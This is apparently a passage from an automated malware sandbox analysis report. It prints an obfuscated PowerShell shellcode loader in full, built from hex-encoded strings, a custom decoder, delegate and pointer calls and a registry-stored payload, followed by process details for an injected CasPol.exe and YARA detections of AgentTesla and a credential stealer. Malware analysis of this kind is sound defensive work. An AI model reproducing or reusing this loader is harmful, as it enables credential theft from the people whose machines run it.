'81F2C0D7C0D7C4D1859885FEF6DCD6D1C0C88BF7D0CBD1CCC8C08BECCBD1C0D7CAD5F6C0D7D3CCC6C0D68BE8C4D7D6CDC4C9F89F9FE2C0D1E1C0C9C0C2C4D1C0E3CAD7E3D0CBC6D1CCCACBF5CACCCBD1C0D78D8DC3CED58581F0CBC6CAD0D5C9C08581E2CDC0C2CCD6CD918C89858DE2E1F185E58DFEECCBD1F5D1D7F88985FEF0ECCBD19697F88985FEF0ECCBD19697F88985FEF0ECCBD19697F88C858DFEECCBD1F5D1D7F88C8C8C';&($Ghegish7) $Hoeres6;$Dmningsprojekter = fkp $Ghegish5 $Ghegish6;$Hoeres7 = Smertensbarns0 '81F6D0CECEC0D7CAD3C0D7D1D7CECEC0D1D69685988581F2C0D7C0D7C4D18BECCBD3CACEC08DFEECCBD1F5D1D7F89F9FFFC0D7CA898596909C898595DD96959595898595DD91958C';&($Ghegish7) $Hoeres7;$Hoeres8 = Smertensbarns0 '81E6CAD7D7CAC7C7CAD7C0C085988581F2C0D7C0D7C4D18BECCBD3CACEC08DFEECCBD1F5D1D7F89F9FFFC0D7CA898595DD949595959595898595DD96959595898595DD918C';&($Ghegish7) $Hoeres8;$Cartwrighting=(Get-ItemProperty -Path 'HKCU:\Pseudambulacrum\konstitutionel').Bjfs;$Hoeres9 = Smertensbarns0 '81EDCAC0D7C0D6859885FEF6DCD6D1C0C88BE6CACBD3C0D7D1F89F9FE3D7CAC8E7C4D6C09391F6D1D7CCCBC28D81E6C4D7D1D2D7CCC2CDD1CCCBC28C';&($Ghegish7) $Hoeres9;$Cartwrighting0 = Smertensbarns0 'FEF6DCD6D1C0C88BF7D0CBD1CCC8C08BECCBD1C0D7CAD5F6C0D7D3CCC6C0D68BE8C4D7D6CDC4C9F89F9FE6CAD5DC8D81EDCAC0D7C0D689859589858581F6D0CECEC0D7CAD3C0D7D1D7CECEC0D1D696898596909C8C';&($Ghegish7) $Cartwrighting0;$Noncondiment2=$Hoeres.count-359;$Cartwrighting1 = Smertensbarns0 'FEF6DCD6D1C0C88BF7D0CBD1CCC8C08BECCBD1C0D7CAD5F6C0D7D3CCC6C0D68BE8C4D7D6CDC4C9F89F9FE6CAD5DC8D81EDCAC0D7C0D6898596909C898581E6CAD7D7CAC7C7CAD7C0C0898581EBCACBC6CACBC1CCC8C0CBD1978C';&($Ghegish7) $Cartwrighting1;$Cartwrighting2 = Smertensbarns0 '81CEC9C4D7C2CFCAD7C1C0859885FEF6DCD6D1C0C88BF7D0CBD1CCC8C08BECCBD1C0D7CAD5F6C0D7D3CCC6C0D68BE8C4D7D6CDC4C9F89F9FE2C0D1E1C0C9C0C2C4D1C0E3CAD7E3D0CBC6D1CCCACBF5CACCCBD1C0D78D81F6D0CECEC0D7CAD3C0D7D1D7CECEC0D1D69689858DE2E1F185E58DFEECCBD1F5D1D7F889FEECCBD1F5D1D7F88C858DFEF3CACCC1F88C8C8C';&($Ghegish7) $Cartwrighting2;$Cartwrighting3 = Smertensbarns0 '81CEC9C4D7C2CFCAD7C1C08BECCBD3CACEC08D81E6CAD7D7CAC7C7CAD7C0C08981E1C8CBCCCBC2D6D5D7CACFC0CED1C0D78C';&($Ghegish7) $Cartwrighting3#
                    Imagebase:
                    File size:433152 bytes
                    MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                    Has elevated privileges:
                    Has administrator privileges:
                    Programmed in:C, C++ or other language
                    Reputation:moderate

                    Target ID:7
                    Start time:15:50:54
                    Start date:01/12/2022
                    Path:C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe
                    Wow64 process (32bit):true
                    Commandline:C:\Windows\Microsoft.NET\Framework\v2.0.50727\caspol.exe
                    Imagebase:0x9b0000
                    File size:106496 bytes
                    MD5 hash:7BAE06CBE364BB42B8C34FCFB90E3EBD
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:.Net C# or VB.NET
                    Yara matches:
                    • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000007.00000002.6671341455.000000001D701000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000007.00000002.6671341455.000000001D701000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                    Reputation:moderate

                    No disassembly